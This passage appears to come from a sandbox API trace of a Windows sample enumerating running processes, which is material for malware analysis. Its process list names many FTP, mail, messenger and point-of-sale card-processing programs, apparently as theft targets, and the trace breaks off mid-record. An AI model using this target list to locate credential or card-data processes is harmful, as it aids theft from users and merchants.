th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0207.723] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0207.726] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0207.729] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0207.731] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0207.734] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0207.737] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0207.741] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0207.743] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0207.746] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0207.749] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0207.752] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0207.754] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0207.756] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0207.763] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0207.766] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0207.768] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0207.771] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0207.773] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0207.775] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0207.777] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0207.780] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0207.782] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0207.784] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0207.786] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0207.789] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0207.791] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0207.793] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0207.796] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0207.802] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0207.805] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0207.807] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0207.809] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0207.811] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0207.814] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0207.816] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0207.818] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0207.821] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0207.823] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0207.826] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0207.828] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0207.831] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0207.833] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0207.836] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0207.843] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0207.847] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.851] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0207.853] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0207.855] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.857] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0207.859] CloseHandle (hObject=0x20fc) returned 1 [0207.859] Sleep (dwMilliseconds=0x64) [0207.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19ec [0208.003] Process32First (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.006] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.008] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.028] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.051] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.054] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.061] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.066] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.078] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.081] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.084] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.159] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.165] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.177] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.180] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.183] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.186] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.189] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.217] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.227] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.237] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0208.245] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.359] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0208.363] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.376] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0208.379] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0208.385] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0208.398] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0208.449] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0208.452] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0208.455] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.459] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.470] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0208.472] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.475] Process32Next (in: hSnapshot=0x19ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, 